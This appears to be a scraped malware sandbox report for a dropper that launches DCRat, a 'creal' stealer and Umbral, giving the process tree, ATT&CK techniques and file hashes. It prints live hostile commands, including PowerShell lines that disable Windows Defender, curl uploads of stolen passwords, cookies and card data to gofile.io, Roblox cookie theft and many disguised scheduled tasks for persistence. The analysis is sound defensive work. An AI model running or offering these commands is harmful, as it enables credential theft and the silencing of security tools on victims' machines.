C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2680
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRat.exe"C:\Users\Admin\AppData\Local\Temp\DCRat.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\BlockComWinRuntime\lVOahidlbzbclXqy46W.vbe"3⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\BlockComWinRuntime\FKb6YL6rIXHhsJz5oxJ.bat" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\BlockComWinRuntime\ComponentcrtSvc.exe"C:\BlockComWinRuntime\ComponentcrtSvc.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/BlockComWinRuntime/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4ejfwe4E8I.bat"6⤵PID:1996
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:1252
-
-
C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe"C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3020
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\creal.exe"C:\Users\Admin\AppData\Local\Temp\creal.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\creal.exe"C:\Users\Admin\AppData\Local\Temp\creal.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store8.gofile.io/uploadFile"4⤵PID:1032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store8.gofile.io/uploadFile"4⤵PID:1092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store8.gofile.io/uploadFile"4⤵PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store8.gofile.io/uploadFile"4⤵PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store8.gofile.io/uploadFile"4⤵PID:2448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store8.gofile.io/uploadFile"4⤵PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/RequestBackup.dib" https://store8.gofile.io/uploadFile"4⤵PID:2344
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:308
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:1608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2792
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵PID:620
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2256
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2040
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:848
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵PID:888
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:2288
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2468
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1928
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2188
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Local Settings\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\Local Settings\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Local Settings\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2408
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:868
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\taskhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1244
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\taskhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\taskhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2288
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Mail\en-US\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1040
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\en-US\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\en-US\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Mozilla Firefox\fonts\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1592
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\fonts\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1308
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Windows\LiveKernelReports\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\creal.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\System.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1588
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2712
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\SchCache\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Windows\SchCache\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1556
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2932
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1974957444104471365110336215912045523024-1395500407671449664-6977735621470681088"1⤵PID:840
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2270211601314833158922237470749500332874447652-1274710209-866003914-2006408240"1⤵PID:3020
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵PID:2372
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" shell32.dll,Options_RunDLL 01⤵PID:1692
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD52bbe35e70e1998f0789923a057e94e39
SHA1d299a860a7a580e42274f11c8570372cb1b925d0
SHA256b70e8bc699cf9c5921099aaab0c4d8bc30af47b5c1383fac4917eeb9e596e8ac
SHA512f584f493a780cba5f9086e752eb5ec2134e1152b60182e08f1a6ce0dfb2200f9500e915817897cdf216083b913abfa899392c8715849f43012c740de166f93e1
-
Filesize
43B
MD5b5c31f6ec8be6924a77f1e630bdcdf1f
SHA139cf1cc17e0512466c0f331d45f12bc1b32b88b5
SHA256cc5a75155fed9e024aeff47671f1c6869c1b1207410d0a40a2f1e43d602b3098
SHA5128f2a9506b959449aef7241e352f60a0cde609e58593fa53146e58c6f798a142e3c03293f1bab0ad542e8088714097b19b36781f7c1e546254376ff20377ed6ff
-
Filesize
214B
MD5d657064160e0214e9a32c7ca7d6dc61b
SHA13ed315e30cc399824209e636505a83ac4898e377
SHA25691a6fc771860523440c842e14aaed74eb425707758052ccc71e3bdc62836dc40
SHA5126bab7d8766050e3283f4f071bd1fc4d6194ed059cb5ecce9b1cded92f06e8ade4f3a0d2609837b15c3ff04ccaa814ddb1a8799c2d3654ad62173a71d8f2b425f
-
Filesize
2KB
MD5a8e72c0e27750ce36da3110126c38afe
SHA1e96bc3555f8ed8e715af94d492965b4e6597563c
SHA256a4f7e5adde35c1979fbf2cc44b37e2907ec963468443e34262b207dd3dab81b8
SHA512e43e2c6abb6006c783331cb8b0e290560bb65f7cfd0e113bbddb31a6978aee31fb39a2b22b38ef83f27d512152329d066bc270e640e8900b2746a2a4e0b4dd48
-
Filesize
813KB
MD5847090941ac25c5e68580e2358a4a23b
SHA10954e8612582ca52a60c18df0094eb1c9f3ac6d4
SHA2564af8f5a10eb1d0ece87c0307d28ff5be5861cc6f64c9f5f00fefa528c240b934
SHA512ecbbd58f34924a9620f94e6ac133ab0af09f4ae7b41a1b7ae56769dd96a9ea523202b340e156c6364bfb1d0f66f9b8edaf8334b13884a720a3e1fa0b168625d2
-
Filesize
229KB
MD5b32700e5b5b7bf783c60eff7e9f8c189
SHA1660d59dd0fd81fd636867ad0bf83e8010095b85d
SHA2569c7e0ea5f70523dc04f16951e9ac68cdbd90d0f53a9724b023484bb9f9b11ba0
SHA5123beba46f80474d1d5162743bc2a8892ab2f1fa3228cff9358c7c9123d6a1b26d3b72a7c9bc8f82a8f3f3502239e3e2539f3f0331bf094069c68bbdcd69196f07
-
Filesize
84KB
MD5ae96651cfbd18991d186a029cbecb30c
SHA118df8af1022b5cb188e3ee98ac5b4da24ac9c526
SHA2561b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1
SHA51242a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7
-
Filesize
151KB
MD50430b925af08c2a400c9cdf6749215ca
SHA1e5d3876c057edbe0f3f7da99bef49be5dc1e6b4e
SHA2565e19921801974d6848952d982eac32e6f1be9f957e128c9e4c7e75b1ab091ad4
SHA512864cf27f74f75abfdbe9a17b76ed5dec62f2f82f3bafafa7a2403e5e37a04866951d83ab2683e3f5f0226d70ef8c4cc415296128684b94b916ce984114894b8a
-
Filesize
220KB
MD57bc3e402069caa8afb04f966e6f2b1cf
SHA18c0f9a0f189ff2f5a6a6c6a1ac8c2cf72afcb3ae
SHA25614a59911e349064e4be60dcbf3a0e60dc0f4c0eee2a406b69c9a24ddee3b60ab
SHA512bd74e6ecbda0e77c3665eb5dbd64a7f6194bcdcff838b9bb1bbeb1367c53491d41c0971602a14d2b4e615b6822f71382b9fe051c3be17464befa8dcf0f884ddd
-
Filesize
24KB
MD5f5bb0b71862c1011de7660e5e5721846
SHA14a3101719fa36f5b9165ef56af41208dfe3dc0e9
SHA256bc2e196bfb21a3f57ca86e96127b1246d47cdaeeb99f6239af38165bf42b5117
SHA512c794681be1da1acd87555c4b9550cc5f2cefa1b8458becb084aee034c2d7be90a44a4aeb0c0778560d16c80bb6c1e05c91fff208e0e550b06c7d7f46902b9e8c
-
Filesize
37KB
MD554c6149ab1c0a621b22be4f4046386b6
SHA11d2e8da6a76e6d2ba0b8fb70954d06fdef1ebc1e
SHA25644d896e8aa8887bad398b03dfdb8cf72aa3c0d87730a2ac0d92763722a426a7f
SHA51261e0c6571f90856baca950e9aac0835a0726e41e516fc3728c81117d9ee248cf0ab3d47c70b34906cbfd9e37583049b7307d53a8981361bdea1095e3f9271896
-
Filesize
67KB
MD5e55a5618e14a01bac452b8399e281d0d
SHA1feb071df789f02cdfc0059dfbea1e2394bfd08ef
SHA25604e286e59facf3f1ddd54d92b45d7662044c0b17d370eb20eb9ca0c8c8e3cb9c
SHA5121b2e57e681ea889aac680a9ae3b6c9f76ccf82cff3fc91f3c1b678851152282199172fd1900997163ae8db2a18ee385f1ecfe8230fcbc7bf1a3a896a869b2a9c
-
Filesize
66KB
MD552f6573b375929635fa819d706a593f1
SHA1b9b7c1342d7a807af9b4b3d07b6987ddc2311df2
SHA256cb64c605efecf4f788a23ad9da756fac3467ee320ff6b40369f731e95faca0da
SHA512149e4d7ce9c8067fd40088c12ede5bc7f4d6f34304410ea7806e375ecd2dc1c2a3a16691d7a1154513f0119bd61d8d510ac0fed113c32c441eeb66a298aba048
-
Filesize
822KB
MD5b55926dc5511d80851550d02cae2cdc3
SHA1d21ac6e9d040db750d152618e673e80f21c4a53d
SHA2566a8d109ef32019e5c6ae18e2ca48a5c0538be246a913a3d2d9dc9bd127807fa9
SHA5121b230365e44c60e2fa3448f41d5d0608f7ef89a724268399b4cdcf1e9a2cb3500dfcfbbcb717862cb3fb1a3d61ce7f6fa4e0cced0943f7e2be29fa49a7881a8b
-
Filesize
28KB
MD5bc20614744ebf4c2b8acd28d1fe54174
SHA1665c0acc404e13a69800fae94efd69a41bdda901
SHA2560c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57
SHA5120c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b
-
Filesize
163KB
MD5e50093c4196ac6c3bd293789248477dd
SHA1fedc09eaa3c938461f96e8b3476c5239ea93a3fe
SHA256a8b218f57e82b57184b00c2ccc9cfd353a84ead0e777037a605427b4907fc69b
SHA512f5c05dbcb9dd4d5c0dc96f3af63023d6ee4760e0e55b839a673411fddd6a63896dd1aa4f4f2985e2853d8e54cc3ec61c83ceda2cffe849baa74221c477bc3992
-
Filesize
57KB
MD5ba32910ffd8a530fa69bc8f37828a6fd
SHA17bb0921ac27708082667fa3be05f08b6817cef7e
SHA2567fa7fef857b5787c355ecd8d1bec5eba28a5bc98f95dcc5130aebcfcfaa20bf4
SHA512a3c254979281b60ff11534e5a1feb2448c302eabdb26c668362b5b3b65a10c91fb2aad611cc93526c209473cb3501a280a7aef21833c5960e8d31449b3a71c01
-
Filesize
3.7MB
MD5d375b654850fa100d4a8d98401c1407f
SHA1ed10c825535e8605b67bacd48f3fcecf978a3fee
SHA256527819a45446a7729e04a70aee587ec7e46d787c159d0f9d4e824e54c1653f4d
SHA512fb3faadc801cbeb0697849cf539e471f7362212935607237b26293976aa65ec454ac601a013eec930a5910bafac8a3863e7d668fc7767dc53a98e84286f582b3
-
